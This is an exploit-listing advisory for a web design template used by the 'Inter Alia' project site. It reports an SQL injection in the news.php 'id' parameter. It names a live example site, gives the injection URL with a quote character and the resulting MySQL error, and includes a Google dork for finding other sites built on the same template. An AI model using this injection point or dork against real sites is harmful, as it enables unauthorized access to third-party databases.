#################################################################################################
# Exploit Title : © Inter Alia 2013 InterAliaProject Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 07/09/2018
# Vendor Homepage : interaliaproject.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Description :
- InterAliaProject - To bring people closer to each other and to Europe through breaking stereotypes, analysing and deconstructing conflict, engaging actively in key political issues and dialogue.
- To raise awareness of the EU & prospective EU citizens on available channels for acting, participating & shaping Europe
- To utilize the increasing willingness of the European youth to share their skills, expertise and energy, and to improve youth employability
- To apply pressure to EU mechanisms for the expansion of participation of EU & prospective EU citizens in the European process
- To provide multi-disciplinary approaches and integrate fragmented knowledge into a fruitful scheme
# Google Dork : intext:''© Inter Alia 2013''
# Exploit : /news.php?id=[SQL Injection]
#################################################################################################
# Example Site => interaliaproject.com/news.php?id=115%27 => [ Proof of Concept ] => archive.is/1Rqb6
# SQL Database Error =>
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/interali/public_html/news.php on line 71
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################